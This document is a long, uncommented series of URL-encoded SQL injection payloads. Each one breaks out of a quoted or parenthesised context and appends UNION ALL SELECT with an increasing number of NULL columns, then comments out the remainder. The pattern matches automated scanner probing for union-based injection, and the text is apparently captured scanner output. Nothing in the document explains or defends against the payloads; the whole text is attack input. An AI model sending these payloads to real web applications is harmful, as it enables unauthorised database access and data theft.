1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22kgLp%22%20LIKE%20%22kgLp 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22KZyB%22%20LIKE%20%22KZyB 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Irfd%22%20LIKE%20%22Irfd 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22eSIc%22%20LIKE%20%22eSIc 1%22%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%22Vtcj%22%20LIKE%20%22Vtcj 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22uZiW%22%20LIKE%20%22uZiW 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22zGkA%22%20LIKE%20%22zGkA 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22fhLP%22%20LIKE%20%22fhLP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22nzFh%22%20LIKE%20%22nzFh 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22QBvP%22%20LIKE%20%22QBvP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22KWlP%22%20LIKE%20%22KWlP 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22wggc%22%20LIKE%20%22wggc 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22voCv%22%20LIKE%20%22voCv 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22LPUc%22%20LIKE%20%22LPUc 1%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%28%28%28%22Gbfo%22%20LIKE%20%22Gbfo 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22rnvR%22%20LIKE%20%22rnvR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22LoZR%22%20LIKE%20%22LoZR 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22sFAX%22%20LIKE%20%22sFAX 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22bJQH%22%20LIKE%20%22bJQH 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22QotM%22%20LIKE%20%22QotM 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22HQvz%22%20LIKE%20%22HQvz 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22QfVq%22%20LIKE%20%22QfVq 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22oFtN%22%20LIKE%20%22oFtN 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22AAkP%22%20LIKE%20%22AAkP 1%22%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23%20AND%20%22WUUl%22%20LIKE%20%22WUUl 1%29%20WHERE%207330%3D7330%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%201520%3D1520%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207132%3D7132%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207831%3D7831%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%208005%3D8005%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207741%3D7741%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%204729%3D4729%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%207600%3D7600%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%204187%3D4187%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%29%20WHERE%208841%3D8841%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%205731%3D5731%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%207788%3D7788%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%208106%3D8106%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209500%3D9500%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%208857%3D8857%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%206651%3D6651%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%204895%3D4895%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%206109%3D6109%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%204548%3D4548%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%29%20WHERE%209042%3D9042%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%208836%3D8836%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%201967%3D1967%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%202723%3D2723%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%204629%3D4629%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%202439%3D2439%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%208847%3D8847%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%203018%3D3018%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%208970%3D8970%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%204666%3D4666%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%27%20WHERE%207316%3D7316%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%206723%3D6723%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%204393%3D4393%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%209901%3D9901%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%204759%3D4759%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%202797%3D2797%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 1%22%20WHERE%206635%3D6635%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%23 